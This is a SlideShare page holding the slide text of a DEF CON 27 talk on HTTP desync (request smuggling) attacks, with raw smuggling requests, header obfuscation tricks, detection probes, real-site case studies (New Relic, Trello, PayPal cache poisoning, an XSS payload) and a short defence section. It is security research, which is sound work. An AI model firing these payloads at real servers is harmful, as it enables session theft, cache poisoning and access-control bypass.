SlideShare ist ein Scribd-Unternehmen logo

DEF CON 27- ALBINOWAX - http desync attacks

Felipe Prado
Felipe Prado

Defcon 27- ALBINOWAX - http desync attacks

Technologie
1 von 32
Downloaden Sie, um offline zu lesen
HTTP DESYNC ATTACKS SMASHING INTO THE CELL NEXT DOOR James Kettle
The Fear Theory Q) What topic am I really scared of? A) HTTP Request Smuggling Hiding Wookiees in HTTP First documented by Watchfire in 2005 "You will not earn bounties" "You will certainly not be considered like a white hat"
• Theory & Methodology • Exploitation Case Studies • Defence • Q&A Outline
Keepalive
Keepalive, desynchronized
Desynchronizing: the classic approach POST / HTTP/1.1 Host: example.com Content-Length: 6 Content-Length: 5 12345G Unknown method GPOST Frontend sees this Backend sees this POST / HTTP/1.1 Host: example.com …
Desynchronizing: the chunked approach POST / HTTP/1.1 Host: example.com Content-Length: 66 Transfer-Encoding: chunked 0 GPOST / HTTP/1.1 … Frontend sees this Backend sees this Unknown method GPOST
Desynchronizing: the TE.CL approach POST / HTTP/1.1 Host: example.com Content-Length: 3 Transfer-Encoding: chunked 6 PREFIX 0 POST / HTTP/1.1 Host: example.com Frontend sees this Backend sees this
Forcing desync If a message is received with both a Transfer-Encoding header field and a Content- Length header field, the latter MUST be ignored. – RFC 2616 #4.4.3 Transfer-Encoding : chunked Transfer-Encoding: xchunked GET / HTTP/1.1 Transfer-Encoding: chunked Transfer-Encoding: chunked Content-Length: 123 Transfer-Encoding : chunked Transfer-Encoding: chunked Transfer-Encoding: x Transfer-Encoding:[tab]chunked X: X[n]Transfer-Encoding: chunked
Methodology
Detecting desync POST /about HTTP/1.1 Host: example.com Transfer-Encoding: chunked Content-Length: 6 0 X CL.CL: backend response TE.TE: backend response TE.CL: timeout CL.TE: socket poison POST /about HTTP/1.1 Host: example.com Transfer-Encoding: chunked Content-Length: 6 3 abc Q CL.CL: backend response TE.TE: frontend response TE.CL: frontend response CL.TE: timeout
Confirming desync POST /search HTTP/1.1 Content-Length: 51 Transfer-Encoding: zchunked 11 =x&q=smuggling&x= 0 GET /404 HTTP/1.1 X: X POST /search HTTP/1.1 Content-Length: 4 Transfer-Encoding: zchunked 96 GET /404 HTTP/1.1 X: X=1&q=smugging&x= Host: example.com Content-Length: 100 x= 0 POST /search HTTP/1.1 Host: example.com Triggers 404 if vulnerable POST /search HTTP/1.1 Host: example.com …
CASE STUDIES
Bypassing rules POST / HTTP/1.1 Host: software-vendor.com Content-Length: 200 Transfer-Encoding: chunked 0 GET /admin HTTP/1.1 Host: software-vendor.com X: X GET / HTTP/1.1 Host: software-vendor.com HTTP/1.1 200 OK Please log in
Bypassing rewrites POST / HTTP/1.1 Host: security-vendor.com X-Forwarded-For: 127.0.0.1 Content-Length: 200 Transfer-Encoding : chunked 0 GET / HTTP/1.1 Host: security-vendor.com X-Forwarded-For: 127.0.0.1 X: XGET… $300 xyz.burpcollaborator.net
Request reflection POST / HTTP/1.1 Host: login.newrelic.com Content-Length: 142 Transfer-Encoding: chunked Transfer-Encoding: x 0 POST /login HTTP/1.1 Host: login.newrelic.com Content-Type: application/x-www-form-urlencoded Content-Length: 100 … login[email]=asdf Please ensure that your email and password are correct. <input id="email" value="asdfPOST /login HTTP/1.1 Host: login.newrelic.com X-Forwarded-For: 81.139.39.150 X-Forwarded-Proto: https X-TLS-Bits: 128 X-TLS-Cipher: ECDHE-RSA-AES128-GCM- SHA256 X-TLS-Version: TLSv1.2 x-nr-external-service: external POST /login HTTP/1.1 Host: login.newrelic.com
Exploring HTTP/1.1 301 Moved Permanently Location: https://staging-alerts.newrelic.com/ GET / HTTP/1.1 Host: staging-alerts.newrelic.com GET / HTTP/1.1 Host: staging-alerts.newrelic.com X-Forwarded-Proto: https HTTP/1.1 404 Not Found Action Controller: Exception caught GET /revision_check HTTP/1.1 Host: staging-alerts.newrelic.com X-Forwarded-Proto: https HTTP/1.1 200 OK Not authorized with header: GET /revision_check HTTP/1.1 Host: staging-alerts.newrelic.com X-Forwarded-Proto: https X-nr-external-service: 1 HTTP/1.1 403 Forbidden Forbidden
Exploring POST /login HTTP/1.1 Host: login.newrelic.com Content-Length: 564 Transfer-Encoding: chunked Transfer-encoding: cow 0 POST /internal_api/934454/session HTTP/1.1 Host: alerts.newrelic.com X-Forwarded-Proto: https Service-Gateway-Account-Id: 934454 Service-Gateway-Is-Newrelic-Admin: true Content-Length: 6 … x=123 { "user": { "account_id": 934454, "is_newrelic_admin": true }, "current_account_id": 934454 … } GET… +$3,000 $3,300
Involuntary request storage POST /1/cards HTTP/1.1 Host: trello.com Transfer-Encoding:[tab]chunked Content-Length: 4 9f PUT /1/members/1234 HTTP/1.1 Host: trello.com Content-Type: application/x-www-form-urlencoded Content-Length: 400 x=x&csrf=1234&username=testzzz&bio=cake 0 GET / HTTP/1.1 Host: trello.com +$1,800 +$2,500 $7,600
Harmful responses POST / HTTP/1.1 Host: saas-app.com Content-Length: 4 Transfer-Encoding : chunked 10 =x&csrf=token&x= 66 POST /index.php HTTP/1.1 Host: saas-app.com Content-Length: 100 SAML=a"><script>alert(1)</script> 0 HTTP/1.1 200 OK … <input name="SAML" value="a"><script>alert(1) </script> 0 POST / HTTP/1.1 Host: saas-app.com Cookie: … "/> POST / HTTP/1.1 Host: saas-app.com Cookie: … +$2,000 $9,600
Accidental Cache Poisoning POST / HTTP/1.1 Host: redacted.com Content-Length: 45 Transfer-Encoding: chunked 0 POST / HTTP/1.1 Host: 52.16.21.24 X: X HTTP/1.1 301 Moved Permanently Location: https://52.16.21.24/ GET /images/x.png HTTP/1.1 Frontend perspective GET /images/x.png HTTP/1.1
Web Cache Deception++ POST / HTTP/1.1 Transfer-Encoding: blah 0 GET /account/settings HTTP/1.1 X: X HTTP/1.1 200 OK Your payment history … GET /static/site.js HTTP/1.1 Sensitive responses with fixed, uncached extensions Sensitive POST responses Frontend perspective Expected habitat: GET /static/site.js HTTP/1.1 Cookie: sessionid=xyz
CDN Chaining POST /cow.jpg HTTP/1.1 Host: redacted.com Content-Type: application/x-www-form-urlencoded Content-Length: 50 Transfer-Encoding: chunked 0 GET / HTTP/1.1 Host: www.redhat.com X: X Red Hat - We make open source technologies for the enterprise GET…
Chaining DOM Problems GET /assets/idx?redir=//redhat.com@evil.net/ HTTP/1.1 Host: www.redhat.com <script> var destination = getQueryParam('redir') [low quality filtering] document.location = destination </script> POST /en/search?dest=../assets/idx?redir=… HTTP/1.1 Host: www.redhat.com HTTP/1.1 301 Found Location: /assets/idx?redir=//redhat.co… Runs on unknown URL in victim's browser Solution: chain a server-side local redirect
'Harmless' responses POST /etc/libs/xyz.js HTTP/1.1 Host: redacted.com Content-Length: 57 Transfer-Encoding: chunked 0 POST /etc HTTP/1.1 Host: burpcollaborator.net X: X HTTP/1.1 301 Moved Permanently Location: https://burpcollaborator.net/etc/ GET /etc/libs/xyz.js HTTP/1.1 … +$550 +$750 +$1,000 +$2,000 +$5,000 +$15,000* $31,900
Web Cache Poisoning POST /webstatic/r/fb/fb-all-prod.pp2.min.js HTTP/1.1 Host: c.paypal.com Content-Length: 61 Transfer-Encoding: chunked 0 GET /webstatic HTTP/1.1 Host: skeletonscribe.net X: XGET /webstatic/r/fb/fb-all-prod.pp2.min.js HTTP/1.1 Host: c.paypal.com Connection: close HTTP/1.1 302 Found Location: http://skeletonscribe.net , c.paypal.com/webstatic/ ? ?
PayPal Poisoning +$18,900 $50,800
Wrapped exploits GET / HTTP/1.1 Host: c.paypal.com Content-Length: 5 Transfer-Encoding: chunked 0 HTTP/1.1 403 Forbidden Server: AkamaiGHost <HTML><HEAD> <TITLE>Access Denied</TITLE> </HEAD> GET / HTTP/1.1 Host: c.paypal.com Content-Length: 5 Transfer-Encoding: chunked 0 HTTP/1.1 200 OK … +$20,000 $70,800
DEMO -bugzilla- +$4,500 $75,300
Tooling • Support manual content-length & chunking • Don't proxy testers Safety • Frontend: Normalize ambiguous requests – RFC 7230 • Frontend: Use HTTP/2 to talk to backend • Backend: Drop request & connection DEFENCE
Whitepaper https://portswigger.net/blog/http-desync-attacks Online labs https://portswigger.net/web-security/request-smuggling Desynchronize https://github.com/portswigger/desynchronize References http://cgisecurity.com/lib/HTTP-Request-Smuggling.pdf DEF CON 24 – regilero - Hiding Wookiees in HTTP Further reading
• Detection doesn't have to be dangerous • HTTP parsing is security critical • Complexity is the enemy TAKEAWAYS @albinowax Email: james.kettle@portswigger.net

Empfohlen

Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...NoNameCon
 
Hidden Gems in HTTP
Hidden Gems in HTTPHidden Gems in HTTP
Hidden Gems in HTTPBen Ramsey
 
Cors kung fu
Cors kung fuCors kung fu
Cors kung fuAditya Balapure
 
Caching the Uncacheable
Caching the UncacheableCaching the Uncacheable
Caching the Uncacheabledanrot
 
HTTP and Your Angry Dog
HTTP and Your Angry DogHTTP and Your Angry Dog
HTTP and Your Angry DogRoss Tuck
 
HTTP Caching in Web Application
HTTP Caching in Web ApplicationHTTP Caching in Web Application
HTTP Caching in Web ApplicationMartins Sipenko
 
Making the Most of HTTP In Your Apps
Making the Most of HTTP In Your AppsMaking the Most of HTTP In Your Apps
Making the Most of HTTP In Your AppsBen Ramsey
 
Http caching basics
Http caching basicsHttp caching basics
Http caching basicsMartin Breest
 

Empfohlen

Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...NoNameCon
 
Hidden Gems in HTTP
Hidden Gems in HTTPHidden Gems in HTTP
Hidden Gems in HTTPBen Ramsey
 
Cors kung fu
Cors kung fuCors kung fu
Cors kung fuAditya Balapure
 
Caching the Uncacheable
Caching the UncacheableCaching the Uncacheable
Caching the Uncacheabledanrot
 
HTTP and Your Angry Dog
HTTP and Your Angry DogHTTP and Your Angry Dog
HTTP and Your Angry DogRoss Tuck
 
HTTP Caching in Web Application
HTTP Caching in Web ApplicationHTTP Caching in Web Application
HTTP Caching in Web ApplicationMartins Sipenko
 
Making the Most of HTTP In Your Apps
Making the Most of HTTP In Your AppsMaking the Most of HTTP In Your Apps
Making the Most of HTTP In Your AppsBen Ramsey
 
Http caching basics
Http caching basicsHttp caching basics
Http caching basicsMartin Breest
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacksDefconRussia
 
rest3d Web3D 2014
rest3d Web3D 2014rest3d Web3D 2014
rest3d Web3D 2014Remi Arnaud
 
Advanced HTTP Caching
Advanced HTTP CachingAdvanced HTTP Caching
Advanced HTTP CachingMartin Breest
 
Leverage HTTP to deliver cacheable websites - Codemotion Rome 2018
Leverage HTTP to deliver cacheable websites - Codemotion Rome 2018Leverage HTTP to deliver cacheable websites - Codemotion Rome 2018
Leverage HTTP to deliver cacheable websites - Codemotion Rome 2018Thijs Feryn
 
Leverage HTTP to deliver cacheable websites - Thijs Feryn - Codemotion Rome 2018
Leverage HTTP to deliver cacheable websites - Thijs Feryn - Codemotion Rome 2018Leverage HTTP to deliver cacheable websites - Thijs Feryn - Codemotion Rome 2018
Leverage HTTP to deliver cacheable websites - Thijs Feryn - Codemotion Rome 2018Codemotion
 
Site Performance - From Pinto to Ferrari
Site Performance - From Pinto to FerrariSite Performance - From Pinto to Ferrari
Site Performance - From Pinto to FerrariJoseph Scott
 
Caching on the Edge
Caching on the EdgeCaching on the Edge
Caching on the EdgeFabien Potencier
 
Varnish
VarnishVarnish
VarnishFabien Potencier
 
Altitude San Francisco 2018: Programming the Edge
Altitude San Francisco 2018: Programming the EdgeAltitude San Francisco 2018: Programming the Edge
Altitude San Francisco 2018: Programming the EdgeFastly
 
Juglouvain http revisited
Juglouvain http revisitedJuglouvain http revisited
Juglouvain http revisitedmarctritschler
 
Elastic stack
Elastic stackElastic stack
Elastic stackMinsoo Jun
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11Combell NV
 
Websockets in Node.js - Making them reliable and scalable
Websockets in Node.js - Making them reliable and scalableWebsockets in Node.js - Making them reliable and scalable
Websockets in Node.js - Making them reliable and scalableGareth Marland
 
Going on an HTTP Diet: Front-End Web Performance
Going on an HTTP Diet: Front-End Web PerformanceGoing on an HTTP Diet: Front-End Web Performance
Going on an HTTP Diet: Front-End Web PerformanceAdam Norwood
 
Developing cacheable PHP applications - PHPLimburgBE 2018
Developing cacheable PHP applications - PHPLimburgBE 2018Developing cacheable PHP applications - PHPLimburgBE 2018
Developing cacheable PHP applications - PHPLimburgBE 2018Thijs Feryn
 
Ruby HTTP clients comparison
Ruby HTTP clients comparisonRuby HTTP clients comparison
Ruby HTTP clients comparisonHiroshi Nakamura
 
CFML Sessions For Dummies
CFML Sessions For DummiesCFML Sessions For Dummies
CFML Sessions For DummiesColdFusionConference
 
Web tech 101
Web tech 101Web tech 101
Web tech 101Dan Phiffer
 
Websockets at tossug
Websockets at tossugWebsockets at tossug
Websockets at tossugclkao
 
Web Cache Poisoning
Web Cache PoisoningWeb Cache Poisoning
Web Cache PoisoningKuldeepPandya5
 
HTTP
HTTPHTTP
HTTPDaniel Kummer
 

Weitere ähnliche Inhalte

Was ist angesagt?

HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacksDefconRussia
 
rest3d Web3D 2014
rest3d Web3D 2014rest3d Web3D 2014
rest3d Web3D 2014Remi Arnaud
 
Advanced HTTP Caching
Advanced HTTP CachingAdvanced HTTP Caching
Advanced HTTP CachingMartin Breest
 
Leverage HTTP to deliver cacheable websites - Codemotion Rome 2018
Leverage HTTP to deliver cacheable websites - Codemotion Rome 2018Leverage HTTP to deliver cacheable websites - Codemotion Rome 2018
Leverage HTTP to deliver cacheable websites - Codemotion Rome 2018Thijs Feryn
 
Leverage HTTP to deliver cacheable websites - Thijs Feryn - Codemotion Rome 2018
Leverage HTTP to deliver cacheable websites - Thijs Feryn - Codemotion Rome 2018Leverage HTTP to deliver cacheable websites - Thijs Feryn - Codemotion Rome 2018
Leverage HTTP to deliver cacheable websites - Thijs Feryn - Codemotion Rome 2018Codemotion
 
Site Performance - From Pinto to Ferrari
Site Performance - From Pinto to FerrariSite Performance - From Pinto to Ferrari
Site Performance - From Pinto to FerrariJoseph Scott
 
Altitude San Francisco 2018: Programming the Edge
Altitude San Francisco 2018: Programming the EdgeAltitude San Francisco 2018: Programming the Edge
Altitude San Francisco 2018: Programming the EdgeFastly
 
Juglouvain http revisited
Juglouvain http revisitedJuglouvain http revisited
Juglouvain http revisitedmarctritschler
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11Combell NV
 
Websockets in Node.js - Making them reliable and scalable
Websockets in Node.js - Making them reliable and scalableWebsockets in Node.js - Making them reliable and scalable
Websockets in Node.js - Making them reliable and scalableGareth Marland
 
Going on an HTTP Diet: Front-End Web Performance
Going on an HTTP Diet: Front-End Web PerformanceGoing on an HTTP Diet: Front-End Web Performance
Going on an HTTP Diet: Front-End Web PerformanceAdam Norwood
 
Developing cacheable PHP applications - PHPLimburgBE 2018
Developing cacheable PHP applications - PHPLimburgBE 2018Developing cacheable PHP applications - PHPLimburgBE 2018
Developing cacheable PHP applications - PHPLimburgBE 2018Thijs Feryn
 
Ruby HTTP clients comparison
Ruby HTTP clients comparisonRuby HTTP clients comparison
Ruby HTTP clients comparisonHiroshi Nakamura
 
Websockets at tossug
Websockets at tossugWebsockets at tossug
Websockets at tossugclkao
 

Was ist angesagt? (20)

HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacks
 
rest3d Web3D 2014
rest3d Web3D 2014rest3d Web3D 2014
rest3d Web3D 2014
 
Advanced HTTP Caching
Advanced HTTP CachingAdvanced HTTP Caching
Advanced HTTP Caching
 
Leverage HTTP to deliver cacheable websites - Codemotion Rome 2018
Leverage HTTP to deliver cacheable websites - Codemotion Rome 2018Leverage HTTP to deliver cacheable websites - Codemotion Rome 2018
Leverage HTTP to deliver cacheable websites - Codemotion Rome 2018
 
Leverage HTTP to deliver cacheable websites - Thijs Feryn - Codemotion Rome 2018
Leverage HTTP to deliver cacheable websites - Thijs Feryn - Codemotion Rome 2018Leverage HTTP to deliver cacheable websites - Thijs Feryn - Codemotion Rome 2018
Leverage HTTP to deliver cacheable websites - Thijs Feryn - Codemotion Rome 2018
 
Site Performance - From Pinto to Ferrari
Site Performance - From Pinto to FerrariSite Performance - From Pinto to Ferrari
Site Performance - From Pinto to Ferrari
 
Caching on the Edge
Caching on the EdgeCaching on the Edge
Caching on the Edge
 
Varnish
VarnishVarnish
Varnish
 
Altitude San Francisco 2018: Programming the Edge
Altitude San Francisco 2018: Programming the EdgeAltitude San Francisco 2018: Programming the Edge
Altitude San Francisco 2018: Programming the Edge
 
Juglouvain http revisited
Juglouvain http revisitedJuglouvain http revisited
Juglouvain http revisited
 
Elastic stack
Elastic stackElastic stack
Elastic stack
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11
 
Websockets in Node.js - Making them reliable and scalable
Websockets in Node.js - Making them reliable and scalableWebsockets in Node.js - Making them reliable and scalable
Websockets in Node.js - Making them reliable and scalable
 
Going on an HTTP Diet: Front-End Web Performance
Going on an HTTP Diet: Front-End Web PerformanceGoing on an HTTP Diet: Front-End Web Performance
Going on an HTTP Diet: Front-End Web Performance
 
Developing cacheable PHP applications - PHPLimburgBE 2018
Developing cacheable PHP applications - PHPLimburgBE 2018Developing cacheable PHP applications - PHPLimburgBE 2018
Developing cacheable PHP applications - PHPLimburgBE 2018
 
Ruby HTTP clients comparison
Ruby HTTP clients comparisonRuby HTTP clients comparison
Ruby HTTP clients comparison
 
CFML Sessions For Dummies
CFML Sessions For DummiesCFML Sessions For Dummies
CFML Sessions For Dummies
 
Web tech 101
Web tech 101Web tech 101
Web tech 101
 
Websockets at tossug
Websockets at tossugWebsockets at tossug
Websockets at tossug
 

Ähnlich wie DEF CON 27- ALBINOWAX - http desync attacks

Interactive web. O rly?
Interactive web. O rly?Interactive web. O rly?
Interactive web. O rly?timbc
 
IBM dwLive, "Internet & HTTP - 잃어버린 패킷을 찾아서..."
IBM dwLive, "Internet & HTTP - 잃어버린 패킷을 찾아서..."IBM dwLive, "Internet & HTTP - 잃어버린 패킷을 찾아서..."
IBM dwLive, "Internet & HTTP - 잃어버린 패킷을 찾아서..."Dongwook Lee
 
Presentation (PowerPoint File)
Presentation (PowerPoint File)Presentation (PowerPoint File)
Presentation (PowerPoint File)webhostingguy
 
Presentation (PowerPoint File)
Presentation (PowerPoint File)Presentation (PowerPoint File)
Presentation (PowerPoint File)webhostingguy
 
Implementing Early Hints in Chrome - Approaches and Challenges
Implementing Early Hints in Chrome - Approaches and ChallengesImplementing Early Hints in Chrome - Approaches and Challenges
Implementing Early Hints in Chrome - Approaches and ChallengesViet-Hoang Tran
 
Type URL, Enter, and Then …
Type URL, Enter, and Then …Type URL, Enter, and Then …
Type URL, Enter, and Then …Jinglun Li
 
Devoxx Maroc 2015 HTTP 1, HTTP 2 and folks
Devoxx Maroc 2015 HTTP 1, HTTP 2 and folksDevoxx Maroc 2015 HTTP 1, HTTP 2 and folks
Devoxx Maroc 2015 HTTP 1, HTTP 2 and folksNicolas Martignole
 
HTTP colon slash slash: the end of the road?
HTTP colon slash slash: the end of the road?HTTP colon slash slash: the end of the road?
HTTP colon slash slash: the end of the road?Alessandro Nadalin
 
Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...
Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...
Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...Ontico
 
CS50 Lecture5
CS50 Lecture5CS50 Lecture5
CS50 Lecture5昀 李
 
Integrated Cache on Netscaler
Integrated Cache on NetscalerIntegrated Cache on Netscaler
Integrated Cache on NetscalerMark Hillick
 
Web Application Security 101 - 02 The Basics
Web Application Security 101 - 02 The BasicsWeb Application Security 101 - 02 The Basics
Web Application Security 101 - 02 The BasicsWebsecurify
 
Internals of how an Http Client works (Final) (3).pdf
Internals of how an Http Client works (Final) (3).pdfInternals of how an Http Client works (Final) (3).pdf
Internals of how an Http Client works (Final) (3).pdfjrhee17
 
20190516 web security-basic
20190516 web security-basic20190516 web security-basic
20190516 web security-basicMksYi
 
OWASP Top 10 - Checkmarx Presentation at Polytechnic Institute of Cávado and Ave
OWASP Top 10 - Checkmarx Presentation at Polytechnic Institute of Cávado and AveOWASP Top 10 - Checkmarx Presentation at Polytechnic Institute of Cávado and Ave
OWASP Top 10 - Checkmarx Presentation at Polytechnic Institute of Cávado and AveCheckmarx
 
Web Fundamentals
Web FundamentalsWeb Fundamentals
Web Fundamentalsarunv
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsneexemil
 

Ähnlich wie DEF CON 27- ALBINOWAX - http desync attacks (20)

Web Cache Poisoning
Web Cache PoisoningWeb Cache Poisoning
Web Cache Poisoning
 
HTTP
HTTPHTTP
HTTP
 
Interactive web. O rly?
Interactive web. O rly?Interactive web. O rly?
Interactive web. O rly?
 
IBM dwLive, "Internet & HTTP - 잃어버린 패킷을 찾아서..."
IBM dwLive, "Internet & HTTP - 잃어버린 패킷을 찾아서..."IBM dwLive, "Internet & HTTP - 잃어버린 패킷을 찾아서..."
IBM dwLive, "Internet & HTTP - 잃어버린 패킷을 찾아서..."
 
Http2 kotlin
Http2 kotlinHttp2 kotlin
Http2 kotlin
 
Presentation (PowerPoint File)
Presentation (PowerPoint File)Presentation (PowerPoint File)
Presentation (PowerPoint File)
 
Presentation (PowerPoint File)
Presentation (PowerPoint File)Presentation (PowerPoint File)
Presentation (PowerPoint File)
 
Implementing Early Hints in Chrome - Approaches and Challenges
Implementing Early Hints in Chrome - Approaches and ChallengesImplementing Early Hints in Chrome - Approaches and Challenges
Implementing Early Hints in Chrome - Approaches and Challenges
 
Type URL, Enter, and Then …
Type URL, Enter, and Then …Type URL, Enter, and Then …
Type URL, Enter, and Then …
 
Devoxx Maroc 2015 HTTP 1, HTTP 2 and folks
Devoxx Maroc 2015 HTTP 1, HTTP 2 and folksDevoxx Maroc 2015 HTTP 1, HTTP 2 and folks
Devoxx Maroc 2015 HTTP 1, HTTP 2 and folks
 
HTTP colon slash slash: the end of the road?
HTTP colon slash slash: the end of the road?HTTP colon slash slash: the end of the road?
HTTP colon slash slash: the end of the road?
 
Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...
Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...
Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...
 
CS50 Lecture5
CS50 Lecture5CS50 Lecture5
CS50 Lecture5
 
Integrated Cache on Netscaler
Integrated Cache on NetscalerIntegrated Cache on Netscaler
Integrated Cache on Netscaler
 
Web Application Security 101 - 02 The Basics
Web Application Security 101 - 02 The BasicsWeb Application Security 101 - 02 The Basics
Web Application Security 101 - 02 The Basics
 
Internals of how an Http Client works (Final) (3).pdf
Internals of how an Http Client works (Final) (3).pdfInternals of how an Http Client works (Final) (3).pdf
Internals of how an Http Client works (Final) (3).pdf
 
20190516 web security-basic
20190516 web security-basic20190516 web security-basic
20190516 web security-basic
 
OWASP Top 10 - Checkmarx Presentation at Polytechnic Institute of Cávado and Ave
OWASP Top 10 - Checkmarx Presentation at Polytechnic Institute of Cávado and AveOWASP Top 10 - Checkmarx Presentation at Polytechnic Institute of Cávado and Ave
OWASP Top 10 - Checkmarx Presentation at Polytechnic Institute of Cávado and Ave
 
Web Fundamentals
Web FundamentalsWeb Fundamentals
Web Fundamentals
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versions
 

Mehr von Felipe Prado

DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directoryDEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directoryFelipe Prado
 
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...Felipe Prado
 
DEF CON 24 - Tamas Szakaly - help i got ants
DEF CON 24 - Tamas Szakaly - help i got antsDEF CON 24 - Tamas Szakaly - help i got ants
DEF CON 24 - Tamas Szakaly - help i got antsFelipe Prado
 
DEF CON 24 - Ladar Levison - compelled decryption
DEF CON 24 - Ladar Levison - compelled decryptionDEF CON 24 - Ladar Levison - compelled decryption
DEF CON 24 - Ladar Levison - compelled decryptionFelipe Prado
 
DEF CON 24 - Clarence Chio - machine duping 101
DEF CON 24 - Clarence Chio - machine duping 101DEF CON 24 - Clarence Chio - machine duping 101
DEF CON 24 - Clarence Chio - machine duping 101Felipe Prado
 
DEF CON 24 - Chris Rock - how to overthrow a government
DEF CON 24 - Chris Rock - how to overthrow a governmentDEF CON 24 - Chris Rock - how to overthrow a government
DEF CON 24 - Chris Rock - how to overthrow a governmentFelipe Prado
 
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardware
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardwareDEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardware
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardwareFelipe Prado
 
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...Felipe Prado
 
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustration
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustrationDEF CON 24 - Jay Beale and Larry Pesce - phishing without frustration
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustrationFelipe Prado
 
DEF CON 24 - Gorenc Sands - hacker machine interface
DEF CON 24 - Gorenc Sands - hacker machine interfaceDEF CON 24 - Gorenc Sands - hacker machine interface
DEF CON 24 - Gorenc Sands - hacker machine interfaceFelipe Prado
 
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionist
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionistDEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionist
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionistFelipe Prado
 
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locks
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locksDEF CON 24 - Rose and Ramsey - picking bluetooth low energy locks
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locksFelipe Prado
 
DEF CON 24 - Rich Mogull - pragmatic cloud security
DEF CON 24 - Rich Mogull - pragmatic cloud securityDEF CON 24 - Rich Mogull - pragmatic cloud security
DEF CON 24 - Rich Mogull - pragmatic cloud securityFelipe Prado
 
DEF CON 24 - Grant Bugher - Bypassing captive portals
DEF CON 24 - Grant Bugher - Bypassing captive portalsDEF CON 24 - Grant Bugher - Bypassing captive portals
DEF CON 24 - Grant Bugher - Bypassing captive portalsFelipe Prado
 
DEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitchDEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitchFelipe Prado
 
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...Felipe Prado
 
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucks
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucksDEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucks
